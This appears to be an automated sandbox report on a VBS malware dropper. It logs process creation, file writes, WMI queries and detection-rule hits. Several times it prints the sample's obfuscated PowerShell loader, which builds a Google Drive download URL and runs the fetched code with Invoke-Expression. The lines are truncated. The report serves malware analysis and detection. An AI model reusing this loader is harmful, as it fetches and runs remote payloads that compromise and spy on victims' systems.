            Source: amsi32_6208.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 6912, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 6208, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Very long command line found
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7215
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 7215
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7215Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 7215Jump to behavior
            Windows Scripting host queries suspicious COM object (likely to drop second stage)
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Wscript starts Powershell (via cmd or directly)
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes.$Svveflyvers.Invoke($Acned, $Unbumped);}$Professorships;}function Jots($Misagent){& ($Jargonens) ($Misagent);}$Orthoarsenite=Disken 'DyrenM.agisoFornozSpasmi GammlcompllJordsaInt,a/ Proa5Gaest.Anu y0slibr ,ters(UnderWTulwaiLyshanFa eldIndsyoStrmpw SnebsC.lam IndtNGu.naT Tabu Balan1Docum0Cowsh. Obl,0Reap.; Ti.l XorinWcataciFusi,nRoya 6Bijug4Cr.ck;Efter ReaffxBalsa6 va,b4.arco;Efter ,andlr Sek.vMilit: nint1fremk2Beiji1Bl,nk.Uncre0 Hard) Albr A,tneG Ga.se Sl.dc s.inkUndero argo/Kazat2Banka0Outs,1impra0Reson0Unapp1Bille0Pikke1eleme RveskF MothiTjenerUnma,ePriapfK.emto AnpaxActiv/Ufo,d1 iru2Pizzl1Tetra.A,opt0Coun ';$Orlops=Disken 'ClaudUPhrensIndhaeDrejerFolk.-Ru,drA CarpgHkasse Unwan relatSuffu ';$Horrify=Disken 'R,nsehEspaltInodot.ranopRent.sFe.ie:,rage/ Kast/SemicdOpfrsrTel,diFlydevHazieeSpeck.Nickeg dtro Bndso DriegHansilAs.emeTradu..asshcBdet.oUnpramPilus/Le.oruSpinncNon.i? FilieFyrsvxSpellpCam.soFragmrTilbatSocia=AttacdPouncoBjergwDekorn.nterlUgekooTalmsaGastrdc,pry&justiiVolumdL,tsv=Uds,y1 CyliuI.rigj istoh IndilSogneMLnninuprveu_ lakuBriksYUncon5MangejAmtsr0 Ga.etTropiuLathevHackeHRail,XO,phasOologbSkovtNMesse0 JohnGInsemftvivl5 BespxAntiacbidraC,untsLOestrQSc.mmuMayorn Ze.eFRacem ';$Cachinnate=Disken 'swine> Kumy ';$Jargonens=Disken 'Unp.uiCo.tre D.ngx aggr ';$Pessimistisk='Blanketten';Jots (Disken 'PredrSInfuse Pr,ntSalgs-Co tiCDiffeoIntelnPaa lt Stboe envanKlaphtKva m Tilbr-RedobPOp,avaUn,xptChlorh urr Er gsTForsl:Homet\ ImpaBKlag,a ContdFlet.nKr,gsiOverdnAfrungUni.ie IsoprDesia.ActustDuplixudstytTiltu Ly.u-FirehVMidshaFl,kel.kspouBortkeEmbry Noto$ ResuPUnblieEp,stsNoncosmven iGarewmIlldiiDra,ts artitPedomiSm lss HypokPe,fe;Folke ');Jots (Disken 'VacatiBekenf Stin Inhal( Lym tOenoleAplodsGonertU.end-Noy npEata.a,ngentKommuhChart JuicT Rigs:tokom\C.uriB JenkaInfardNobilnFor.oiFininnAabengAffa eClairr Nonr.Age.tt til,x,iktotUnbla)Ova o{Hundee nstmxFor oi onant ,xsa}Aand.;Tr,ld ');$Monotonises = Disken 'MadoleBuzzwcPlaceh TromoSmede Affil% otaaCurcip Chrop Bre,dBestta sidetPrincaLegwo%,anke\DyppeKKvg.elAfkoraVoldspCotanj KrisaUnloqgSparetH,alpeProc.rkeesdsErita.DatapSDisple Radap Er,v Thomi& Linj&forko Al.neFalusc HydrhChilioDetru Exone$Rekur ';Jots (Disken ' icho$Al rmgSalgsl EklioKonnibSelfsaAfs.alDe.om:FrnvnSC ianyFac.dnStubbk Le tr alumoIs.denForhisMi levbromomBeboen HngsiChefknPseudgForsms Menu=Fr ki(CatticSkabnmSierrdVr.ma .rusk/Outstc Laic Virtu$,roxiMSt,afo pocn uryoSjleat Scylo Fi.knAgurkiFibersTresaeA.tifsC cre)Mes.n ');Jots (Disken 'Sleke$SkrkpgQuatel,koleoHairmbTrotta AllulKulka: emorpSemitaDogslrUnthraOpfrsdUnderruforroBaadepTiptap,isfoiBemusn HebdgUd ad=Refam$ FreuHFjendo NewlrVinker B
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes.$Svveflyvers.Invoke($Acned, $Unbumped);}$Professorships;}function Jots($Misagent){& ($Jargonens) ($Misagent);}$Orthoarsenite=Disken 'DyrenM.agisoFornozSpasmi GammlcompllJordsaInt,a/ Proa5Gaest.Anu y0slibr ,ters(UnderWTulwaiLyshanFa eldIndsyoStrmpw SnebsC.lam IndtNGu.naT Tabu Balan1Docum0Cowsh. Obl,0Reap.; Ti.l XorinWcataciFusi,nRoya 6Bijug4Cr.ck;Efter ReaffxBalsa6 va,b4.arco;Efter ,andlr Sek.vMilit: nint1fremk2Beiji1Bl,nk.Uncre0 Hard) Albr A,tneG Ga.se Sl.dc s.inkUndero argo/Kazat2Banka0Outs,1impra0Reson0Unapp1Bille0Pikke1eleme RveskF MothiTjenerUnma,ePriapfK.emto AnpaxActiv/Ufo,d1 iru2Pizzl1Tetra.A,opt0Coun ';$Orlops=Disken 'ClaudUPhrensIndhaeDrejerFolk.-Ru,drA CarpgHkasse Unwan relatSuffu ';$Horrify=Disken 'R,nsehEspaltInodot.ranopRent.sFe.ie:,rage/ Kast/SemicdOpfrsrTel,diFlydevHazieeSpeck.Nickeg dtro Bndso DriegHansilAs.emeTradu..asshcBdet.oUnpramPilus/Le.oruSpinncNon.i? FilieFyrsvxSpellpCam.soFragmrTilbatSocia=AttacdPouncoBjergwDekorn.nterlUgekooTalmsaGastrdc,pry&justiiVolumdL,tsv=Uds,y1 CyliuI.rigj istoh IndilSogneMLnninuprveu_ lakuBriksYUncon5MangejAmtsr0 Ga.etTropiuLathevHackeHRail,XO,phasOologbSkovtNMesse0 JohnGInsemftvivl5 BespxAntiacbidraC,untsLOestrQSc.mmuMayorn Ze.eFRacem ';$Cachinnate=Disken 'swine> Kumy ';$Jargonens=Disken 'Unp.uiCo.tre D.ngx aggr ';$Pessimistisk='Blanketten';Jots (Disken 'PredrSInfuse Pr,ntSalgs-Co tiCDiffeoIntelnPaa lt Stboe envanKlaphtKva m Tilbr-RedobPOp,avaUn,xptChlorh urr Er gsTForsl:Homet\ ImpaBKlag,a ContdFlet.nKr,gsiOverdnAfrungUni.ie IsoprDesia.ActustDuplixudstytTiltu Ly.u-FirehVMidshaFl,kel.kspouBortkeEmbry Noto$ ResuPUnblieEp,stsNoncosmven iGarewmIlldiiDra,ts artitPedomiSm lss HypokPe,fe;Folke ');Jots (Disken 'VacatiBekenf Stin Inhal( Lym tOenoleAplodsGonertU.end-Noy npEata.a,ngentKommuhChart JuicT Rigs:tokom\C.uriB JenkaInfardNobilnFor.oiFininnAabengAffa eClairr Nonr.Age.tt til,x,iktotUnbla)Ova o{Hundee nstmxFor oi onant ,xsa}Aand.;Tr,ld ');$Monotonises = Disken 'MadoleBuzzwcPlaceh TromoSmede Affil% otaaCurcip Chrop Bre,dBestta sidetPrincaLegwo%,anke\DyppeKKvg.elAfkoraVoldspCotanj KrisaUnloqgSparetH,alpeProc.rkeesdsErita.DatapSDisple Radap Er,v Thomi& Linj&forko Al.neFalusc HydrhChilioDetru Exone$Rekur ';Jots (Disken ' icho$Al rmgSalgsl EklioKonnibSelfsaAfs.alDe.om:FrnvnSC ianyFac.dnStubbk Le tr alumoIs.denForhisMi levbromomBeboen HngsiChefknPseudgForsms Menu=Fr ki(CatticSkabnmSierrdVr.ma .rusk/Outstc Laic Virtu$,roxiMSt,afo pocn uryoSjleat Scylo Fi.knAgurkiFibersTresaeA.tifsC cre)Mes.n ');Jots (Disken 'Sleke$SkrkpgQuatel,koleoHairmbTrotta AllulKulka: emorpSemitaDogslrUnthraOpfrsdUnderruforroBaadepTiptap,isfoiBemusn HebdgUd ad=Refam$ FreuHFjendo NewlrVinker BJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B89CED61_2_00007FFD9B89CED6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B89DC821_2_00007FFD9B89DC82
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0257E0E79_2_0257E0E7
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0257E7589_2_0257E758
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_02574AD09_2_02574AD0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_02573EB89_2_02573EB8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0257EFE89_2_0257EFE8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_025742009_2_02574200
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeCode function: 10_2_00621C5C10_2_00621C5C
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeCode function: 10_2_006225D310_2_006225D3
            Source: Umulighed.vbsInitial sample: Strings found which are bigger than 50
            Source: amsi64_6912.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: amsi32_6208.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 6912, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 6208, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@15/8@4/4
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Klapjagters.SepJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6936:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_arxcys0t.gux.ps1Jump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Umulighed.vbs"
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeCommand line argument: P^)u10_2_00621C5C
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeCommand line argument: WABOpen10_2_00621C5C
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeCommand line argument: 5b10_2_00623530
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6912
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6208
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Umulighed.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes.$Svveflyvers.Invoke($Acned, $Unbumped);}$Professorships;}function Jots($Misagent){& ($Jargonens) ($Misagent);}$Orthoarsenite=Disken 'DyrenM.agisoFornozSpasmi GammlcompllJordsaInt,a/ Proa5Gaest.Anu y0slibr ,ters(UnderWTulwaiLyshanFa eldIndsyoStrmpw SnebsC.lam IndtNGu.naT Tabu Balan1Docum0Cowsh. Obl,0Reap.; Ti.l XorinWcataciFusi,nRoya 6Bijug4Cr.ck;Efter ReaffxBalsa6 va,b4.arco;Efter ,andlr Sek.vMilit: nint1fremk2Beiji1Bl,nk.Uncre0 Hard) Albr A,tneG Ga.se Sl.dc s.inkUndero argo/Kazat2Banka0Outs,1impra0Reson0Unapp1Bille0Pikke1eleme RveskF MothiTjenerUnma,ePriapfK.emto AnpaxActiv/Ufo,d1 iru2Pizzl1Tetra.A,opt0Coun ';$Orlops=Disken 'ClaudUPhrensIndhaeDrejerFolk.-Ru,drA CarpgHkasse Unwan relatSuffu ';$Horrify=Disken 'R,nsehEspaltInodot.ranopRent.sFe.ie:,rage/ Kast/SemicdOpfrsrTel,diFlydevHazieeSpeck.Nickeg dtro Bndso DriegHansilAs.emeTradu..asshcBdet.oUnpramPilus/Le.oruSpinncNon.i? FilieFyrsvxSpellpCam.soFragmrTilbatSocia=AttacdPouncoBjergwDekorn.nterlUgekooTalmsaGastrdc,pry&justiiVolumdL,tsv=Uds,y1 CyliuI.rigj istoh IndilSogneMLnninuprveu_ lakuBriksYUncon5MangejAmtsr0 Ga.etTropiuLathevHackeHRail,XO,phasOologbSkovtNMesse0 JohnGInsemftvivl5 BespxAntiacbidraC,untsLOestrQSc.mmuMayorn Ze.eFRacem ';$Cachinnate=Disken 'swine> Kumy ';$Jargonens=Disken 'Unp.uiCo.tre D.ngx aggr ';$Pessimistisk='Blanketten';Jots (Disken 'PredrSInfuse Pr,ntSalgs-Co tiCDiffeoIntelnPaa lt Stboe envanKlaphtKva m Tilbr-RedobPOp,avaUn,xptChlorh urr Er gsTForsl:Homet\ ImpaBKlag,a ContdFlet.nKr,gsiOverdnAfrungUni.ie IsoprDesia.ActustDuplixudstytTiltu Ly.u-FirehVMidshaFl,kel.kspouBortkeEmbry Noto$ ResuPUnblieEp,stsNoncosmven iGarewmIlldiiDra,ts artitPedomiSm lss HypokPe,fe;Folke ');Jots (Disken 'VacatiBekenf Stin Inhal( Lym tOenoleAplodsGonertU.end-Noy npEata.a,ngentKommuhChart JuicT Rigs:tokom\C.uriB JenkaInfardNobilnFor.oiFininnAabengAffa eClairr Nonr.Age.tt til,x,iktotUnbla)Ova o{Hundee nstmxFor oi onant ,xsa}Aand.;Tr,ld ');$Monotonises = Disken 'MadoleBuzzwcPlaceh TromoSmede Affil% otaaCurcip Chrop Bre,dBestta sidetPrincaLegwo%,anke\DyppeKKvg.elAfkoraVoldspCotanj KrisaUnloqgSparetH,alpeProc.rkeesdsErita.DatapSDisple Radap Er,v Thomi& Linj&forko Al.neFalusc HydrhChilioDetru Exone$Rekur ';Jots (Disken ' icho$Al rmgSalgsl EklioKonnibSelfsaAfs.alDe.om:FrnvnSC ianyFac.dnStubbk Le tr alumoIs.denForhisMi levbromomBeboen HngsiChefknPseudgForsms Menu=Fr ki(CatticSkabnmSierrdVr.ma .rusk/Outstc Laic Virtu$,roxiMSt,afo pocn uryoSjleat Scylo Fi.knAgurkiFibersTresaeA.tifsC cre)Mes.n ');Jots (Disken 'Sleke$SkrkpgQuatel,koleoHairmbTrotta AllulKulka: emorpSemitaDogslrUnthraOpfrsdUnderruforroBaadepTiptap,isfoiBemusn HebdgUd ad=Refam$ FreuHFjendo NewlrVinker B
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klapjagters.Sep && echo $"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes.$Svveflyvers.Invoke($Acned, $Unbumped);}$Professorships;}function Jots($Misagent){& ($Jargonens) ($Misagent);}$Orthoarsenite=Disken 'DyrenM.agisoFornozSpasmi GammlcompllJordsaInt,a/ Proa5Gaest.Anu y0slibr ,ters(UnderWTulwaiLyshanFa eldIndsyoStrmpw SnebsC.lam IndtNGu.naT Tabu Balan1Docum0Cowsh. Obl,0Reap.; Ti.l XorinWcataciFusi,nRoya 6Bijug4Cr.ck;Efter ReaffxBalsa6 va,b4.arco;Efter ,andlr Sek.vMilit: nint1fremk2Beiji1Bl,nk.Uncre0 Hard) Albr A,tneG Ga.se Sl.dc s.inkUndero argo/Kazat2Banka0Outs,1impra0Reson0Unapp1Bille0Pikke1eleme RveskF MothiTjenerUnma,ePriapfK.emto AnpaxActiv/Ufo,d1 iru2Pizzl1Tetra.A,opt0Coun ';$Orlops=Disken 'ClaudUPhrensIndhaeDrejerFolk.-Ru,drA CarpgHkasse Unwan relatSuffu ';$Horrify=Disken 'R,nsehEspaltInodot.ranopRent.sFe.ie:,rage/ Kast/SemicdOpfrsrTel,diFlydevHazieeSpeck.Nickeg dtro Bndso DriegHansilAs.emeTradu..asshcBdet.oUnpramPilus/Le.oruSpinncNon.i? FilieFyrsvxSpellpCam.soFragmrTilbatSocia=AttacdPouncoBjergwDekorn.nterlUgekooTalmsaGastrdc,pry&justiiVolumdL,tsv=Uds,y1 CyliuI.rigj istoh IndilSogneMLnninuprveu_ lakuBriksYUncon5MangejAmtsr0 Ga.etTropiuLathevHackeHRail,XO,phasOologbSkovtNMesse0 JohnGInsemftvivl5 BespxAntiacbidraC,untsLOestrQSc.mmuMayorn Ze.eFRacem ';$Cachinnate=Disken 'swine> Kumy ';$Jargonens=Disken 'Unp.uiCo.tre D.ngx aggr ';$Pessimistisk='Blanketten';Jots (Disken 'PredrSInfuse Pr,ntSalgs-Co tiCDiffeoIntelnPaa lt Stboe envanKlaphtKva m Tilbr-RedobPOp,avaUn,xptChlorh urr Er gsTForsl:Homet\ ImpaBKlag,a ContdFlet.nKr,gsiOverdnAfrungUni.ie IsoprDesia.ActustDuplixudstytTiltu Ly.u-FirehVMidshaFl,kel.kspouBortkeEmbry Noto$ ResuPUnblieEp,stsNoncosmven iGarewmIlldiiDra,ts artitPedomiSm lss HypokPe,fe;Folke ');Jots (Disken 'VacatiBekenf Stin Inhal( Lym tOenoleAplodsGonertU.end-Noy npEata.a,ngentKommuhChart JuicT Rigs:tokom\C.uriB JenkaInfardNobilnFor.oiFininnAabengAffa eClairr Nonr.Age.tt til,x,iktotUnbla)Ova o{Hundee nstmxFor oi onant ,xsa}Aand.;Tr,ld ');$Monotonises = Disken 'MadoleBuzzwcPlaceh TromoSmede Affil% otaaCurcip Chrop Bre,dBestta sidetPrincaLegwo%,anke\DyppeKKvg.elAfkoraVoldspCotanj KrisaUnloqgSparetH,alpeProc.rkeesdsErita.DatapSDisple Radap Er,v Thomi& Linj&forko Al.neFalusc HydrhChilioDetru Exone$Rekur ';Jots (Disken ' icho$Al rmgSalgsl EklioKonnibSelfsaAfs.alDe.om:FrnvnSC ianyFac.dnStubbk Le tr alumoIs.denForhisMi levbromomBeboen HngsiChefknPseudgForsms Menu=Fr ki(CatticSkabnmSierrdVr.ma .rusk/Outstc Laic Virtu$,roxiMSt,afo pocn uryoSjleat Scylo Fi.knAgurkiFibersTresaeA.tifsC cre)Mes.n ');Jots (Disken 'Sleke$SkrkpgQuatel,koleoHairmbTrotta AllulKulka: emorpSemitaDogslrUnthraOpfrsdUnderruforroBaadepTiptap,isfoiBemusn HebdgUd ad=Refam$ FreuHFjendo NewlrVinker B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klapjagters.Sep && echo $"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\newfile\newfile.exe "C:\Users\user\AppData\Roaming\newfile\newfile.exe"
            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\newfile\newfile.exe "C:\Users\user\AppData\Roaming\newfile\newfile.exe"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes.$Svveflyvers.Invoke($Acned, $Unbumped);}$Professorships;}function Jots($Misagent){& ($Jargonens) ($Misagent);}$Orthoarsenite=Disken 'DyrenM.agisoFornozSpasmi GammlcompllJordsaInt,a/ Proa5Gaest.Anu y0slibr ,ters(UnderWTulwaiLyshanFa eldIndsyoStrmpw SnebsC.lam IndtNGu.naT Tabu Balan1Docum0Cowsh. Obl,0Reap.; Ti.l XorinWcataciFusi,nRoya 6Bijug4Cr.ck;Efter ReaffxBalsa6 va,b4.arco;Efter ,andlr Sek.vMilit: nint1fremk2Beiji1Bl,nk.Uncre0 Hard) Albr A,tneG Ga.se Sl.dc s.inkUndero argo/Kazat2Banka0Outs,1impra0Reson0Unapp1Bille0Pikke1eleme RveskF MothiTjenerUnma,ePriapfK.emto AnpaxActiv/Ufo,d1 iru2Pizzl1Tetra.A,opt0Coun ';$Orlops=Disken 'ClaudUPhrensIndhaeDrejerFolk.-Ru,drA CarpgHkasse Unwan relatSuffu ';$Horrify=Disken 'R,nsehEspaltInodot.ranopRent.sFe.ie:,rage/ Kast/SemicdOpfrsrTel,diFlydevHazieeSpeck.Nickeg dtro Bndso DriegHansilAs.emeTradu..asshcBdet.oUnpramPilus/Le.oruSpinncNon.i? FilieFyrsvxSpellpCam.soFragmrTilbatSocia=AttacdPouncoBjergwDekorn.nterlUgekooTalmsaGastrdc,pry&justiiVolumdL,tsv=Uds,y1 CyliuI.rigj istoh IndilSogneMLnninuprveu_ lakuBriksYUncon5MangejAmtsr0 Ga.etTropiuLathevHackeHRail,XO,phasOologbSkovtNMesse0 JohnGInsemftvivl5 BespxAntiacbidraC,untsLOestrQSc.mmuMayorn Ze.eFRacem ';$Cachinnate=Disken 'swine> Kumy ';$Jargonens=Disken 'Unp.uiCo.tre D.ngx aggr ';$Pessimistisk='Blanketten';Jots (Disken 'PredrSInfuse Pr,ntSalgs-Co tiCDiffeoIntelnPaa lt Stboe envanKlaphtKva m Tilbr-RedobPOp,avaUn,xptChlorh urr Er gsTForsl:Homet\ ImpaBKlag,a ContdFlet.nKr,gsiOverdnAfrungUni.ie IsoprDesia.ActustDuplixudstytTiltu Ly.u-FirehVMidshaFl,kel.kspouBortkeEmbry Noto$ ResuPUnblieEp,stsNoncosmven iGarewmIlldiiDra,ts artitPedomiSm lss HypokPe,fe;Folke ');Jots (Disken 'VacatiBekenf Stin Inhal( Lym tOenoleAplodsGonertU.end-Noy npEata.a,ngentKommuhChart JuicT Rigs:tokom\C.uriB JenkaInfardNobilnFor.oiFininnAabengAffa eClairr Nonr.Age.tt til,x,iktotUnbla)Ova o{Hundee nstmxFor oi onant ,xsa}Aand.;Tr,ld ');$Monotonises = Disken 'MadoleBuzzwcPlaceh TromoSmede Affil% otaaCurcip Chrop Bre,dBestta sidetPrincaLegwo%,anke\DyppeKKvg.elAfkoraVoldspCotanj KrisaUnloqgSparetH,alpeProc.rkeesdsErita.DatapSDisple Radap Er,v Thomi& Linj&forko Al.neFalusc HydrhChilioDetru Exone$Rekur ';Jots (Disken ' icho$Al rmgSalgsl EklioKonnibSelfsaAfs.alDe.om:FrnvnSC ianyFac.dnStubbk Le tr alumoIs.denForhisMi levbromomBeboen HngsiChefknPseudgForsms Menu=Fr ki(CatticSkabnmSierrdVr.ma .rusk/Outstc Laic Virtu$,roxiMSt,afo pocn uryoSjleat Scylo Fi.knAgurkiFibersTresaeA.tifsC cre)Mes.n ');Jots (Disken 'Sleke$SkrkpgQuatel,koleoHairmbTrotta AllulKulka: emorpSemitaDogslrUnthraOpfrsdUnderruforroBaadepTiptap,isfoiBemusn HebdgUd ad=Refam$ FreuHFjendo NewlrVinker BJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klapjagters.Sep && echo $"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes.$Svveflyvers.Invoke($Acned, $Unbumped);}$Professorships;}function Jots($Misagent){& ($Jargonens) ($Misagent);}$Orthoarsenite=Disken 'DyrenM.agisoFornozSpasmi GammlcompllJordsaInt,a/ Proa5Gaest.Anu y0slibr ,ters(UnderWTulwaiLyshanFa eldIndsyoStrmpw SnebsC.lam IndtNGu.naT Tabu Balan1Docum0Cowsh. Obl,0Reap.; Ti.l XorinWcataciFusi,nRoya 6Bijug4Cr.ck;Efter ReaffxBalsa6 va,b4.arco;Efter ,andlr Sek.vMilit: nint1fremk2Beiji1Bl,nk.Uncre0 Hard) Albr A,tneG Ga.se Sl.dc s.inkUndero argo/Kazat2Banka0Outs,1impra0Reson0Unapp1Bille0Pikke1eleme RveskF MothiTjenerUnma,ePriapfK.emto AnpaxActiv/Ufo,d1 iru2Pizzl1Tetra.A,opt0Coun ';$Orlops=Disken 'ClaudUPhrensIndhaeDrejerFolk.-Ru,drA CarpgHkasse Unwan relatSuffu ';$Horrify=Disken 'R,nsehEspaltInodot.ranopRent.sFe.ie:,rage/ Kast/SemicdOpfrsrTel,diFlydevHazieeSpeck.Nickeg dtro Bndso DriegHansilAs.emeTradu..asshcBdet.oUnpramPilus/Le.oruSpinncNon.i? FilieFyrsvxSpellpCam.soFragmrTilbatSocia=AttacdPouncoBjergwDekorn.nterlUgekooTalmsaGastrdc,pry&justiiVolumdL,tsv=Uds,y1 CyliuI.rigj istoh IndilSogneMLnninuprveu_ lakuBriksYUncon5MangejAmtsr0 Ga.etTropiuLathevHackeHRail,XO,phasOologbSkovtNMesse0 JohnGInsemftvivl5 BespxAntiacbidraC,untsLOestrQSc.mmuMayorn Ze.eFRacem 